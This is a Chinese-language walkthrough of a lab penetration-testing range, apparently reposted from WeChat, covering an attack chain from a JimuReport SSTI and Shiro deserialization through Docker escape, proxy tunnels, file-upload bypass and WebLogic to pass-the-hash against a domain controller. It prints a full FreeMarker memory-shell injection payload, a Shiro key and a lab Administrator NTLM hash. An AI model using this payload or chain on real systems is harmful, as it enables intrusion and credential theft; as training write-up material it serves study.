环境:https://mp.weixin.qq.com/s/QokEYAqUfEaXxpbrqvr3uA
10.10.0.3-入口
发现数据库弱口令,还有两个 web 站,DocToolkit 在长城杯时候碰到过,有个 shiro 反序列化的洞
Mysql 登录发现了找到jeecg的信息
探测发现存在多个漏洞
积木报表 SSTI
执行命令
使用工具注入内存马失败
手工注入
{"sql":"call${"freemarker.template.utility.ObjectConstructor"?new()("javax.script.ScriptEngineManager").getEngineByName("js").eval("classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};")}","dbSource":"","type":"0"}
使用工具生成内存马替换
连接
信息收集一下,发现很多命令都没有
Shiro 反序列化
发现 DocToolkit 的源码,然后脱下来反编译
找到 shiro 秘钥
QZIysgMYhG7/CzIJlVpR1g==
成了
然后注入内存马
Docker 容器逃逸
信息收集是发现了点不对劲,猜测是在 docker 容器里
验证一下
查找.dockerenv文件
查询cgroup进程
查看容器环境变量
信息收集过程中发在貌似挂载了主机目录
写计划任务反弹 shell,这块一些莫名其妙的原因没成功,所以换个思路
使用 vshell 直接搭建隧道
下载文件
给权限执行
成功拿下主机,信息收集一波
192.168.80.55-文件上传
搭建个 socks 代理
目录扫描扫到了 up. php
构造文件上传的包
最后.htaccess文件解析绕过成功上传
结合刚开始扫到的路径构造,蚁剑连接
信息收集一下
有火绒
无域环境
双网卡,通向 192.168.81.0 网段
传个免杀是的 fscan 扫一下
不会 vshell 搭建二层代理,换 stowaway
192.168.81.22-weblogic
一把梭,打入内存马
信息收集一哈
无杀软
存在域环境 c3ting.org
抓个密码,用哥斯拉自带的 mimikatz
梳理一下
DC:192.168.77.250WIN-LAVRSND6J6N.c3ting.orgUsername : AdministratorDomain : C3TINGNTLM : 7ab183888ecafcccf897c4a5a59c8568SHA1 : 65e4580b288c7c555e21f70d81dd6e0b72397ed9
192.168.77.250-域控
搭建隧道,做个 socks 代理,Pth成功拿下
隧道
参考
https://mp.weixin.qq.com/s/7EIw-k8GcL_HL4LzWOd56w
https://mp.weixin.qq.com/s/YOUnMVnvEsvTuLHQwOMs8Q
https://xz.aliyun.com/t/12495
原文始发于微信公众号(安服仔Yu9):无限安全靶场-月挑战1
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论